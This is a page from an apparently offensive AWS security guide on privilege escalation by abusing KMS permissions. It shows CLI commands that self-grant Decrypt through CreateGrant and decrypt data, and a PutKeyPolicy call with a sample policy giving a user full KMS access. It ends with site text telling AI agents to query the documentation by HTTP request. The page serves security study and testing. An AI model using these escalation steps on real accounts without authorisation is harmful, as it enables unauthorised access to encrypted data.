# Key Management Service (KMS)

## kms:CreateGrant

* With this action available, you can provide yourself a Grant to a KMS key and effectively give yourself access.
* Grants are considered along with key policies and IAM policies and are often used for temporary permissions because you can create one, use its permissions, and delete it without changing your key policies or IAM policies.

{% code overflow="wrap" %}

```bash
# create a grant for yourself
aws kms create-grant --key-id <keyId> --grantee-principal <userARN> --operations Decrypt
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# decrypt data with the grant
aws kms decrypt --grant-tokens <grantToken> --ciphertext-blob <cipherText> --key-id <keyId> --output text --query Plaintext | base64 --decode
```

{% endcode %}

***

## kms:PutKeyPolicy

* With this action available, you can update or replace the Key Policy for a KMS key to permit yourself.

{% code overflow="wrap" %}

```bash
# update key policy
aws kms put-key-policy --policy file://key-policy.json --policy-name default --key-id <keyId>
```

{% endcode %}

{% code overflow="wrap" %}

```json
# sample key policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:role/root"
            },
            "Action": "kms:*",
            "Resource": "*"
        },
        {
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::123456789012:user/<userName>"
            },
            "Action": [
                "kms:*"
            ],
            "Resource": "*"
        }
    ]
}
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://www.techwithtyler.dev/cloud-security/aws/aws-offensive-security/aws-privilege-escalation/permissions-abuse-1.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.